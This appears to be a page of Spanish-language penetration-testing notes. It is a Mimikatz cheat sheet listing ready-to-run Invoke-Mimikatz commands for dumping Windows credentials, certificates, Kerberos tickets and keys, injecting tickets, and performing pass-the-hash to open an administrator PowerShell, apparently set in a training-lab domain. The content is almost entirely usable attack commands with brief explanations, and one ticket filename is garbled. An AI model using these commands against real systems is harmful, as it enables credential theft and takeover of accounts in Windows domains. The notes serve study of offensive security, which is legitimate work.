Mimikatz & PassTheHash

Mimikatz

Es la herramienta más usada para extraer hashes y contraseñas de máquinas Windows, que podemos obtener desde su repositorio.

Las credenciales del dominio se almacenan en el fichero ntds.dit en la máquina del Domain Controller (DC).

Obtener credenciales en la máquina local

Invoke-Mimikatz -DumpCreds

Obtener certificados en la máquina local

Invoke-Mimikatz –DumpCerts

Obtener credenciales de varias máquinas remotas

Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")

Exportar todos los tickets de la máquina

Invoke-Mimikatz -Command '"kerberos::list /export"'

Listar los tickets de los usuarios autenticados en la máquina local

Invoke-Mimikatz –Command '"sekurlsa::tickets"'

Listar claves de cifrado de Kerberos

Invoke-Mimikatz –Command '"sekurlsa::ekeys"'

Inyectar ticket

Invoke-Mimikatz -Command '"kerberos::ptt [email protected]@DOMIAIN.LOCAL_cifs~dcorpmssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'

Pass The Hash (PTH)

Usa el hash NTLM de un usuario para suplantar su identidad. En este caso también abre una consola de powershell.

Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:<ntlmhash> /run:powershell.exe"'

PreviousEnumeracion NextLocal Privilege Escalation

Last updated 1 year ago

hashtagMimikatz

hashtagPass The Hash (PTH)

Mimikatz

Pass The Hash (PTH)